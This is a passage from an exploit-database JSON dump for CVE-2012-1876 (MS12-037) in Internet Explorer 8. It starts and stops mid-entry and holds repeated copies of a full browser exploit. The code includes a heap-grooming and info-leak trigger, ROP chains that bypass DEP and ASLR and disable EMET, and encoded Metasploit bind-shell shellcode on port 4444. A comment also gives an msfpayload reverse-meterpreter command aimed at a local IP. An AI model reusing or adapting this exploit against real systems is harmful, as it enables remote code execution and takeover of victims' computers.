rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // Standard DEP bypass\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "exploitpack", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "href": "", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop39 = rop.substring(4,8);\n var rop40 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\n var rop = rop.toString(16);\n var rop43 = rop.substring(4,8);\n var rop44 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02\n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-17T19:29:43", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2014-11-18T00:00:00", "type": "zdt", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-11-18T00:00:00", "id": "1337DAY-ID-22895", "href": "https://0day.today/exploit/description/22895", "sourceData": "\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n 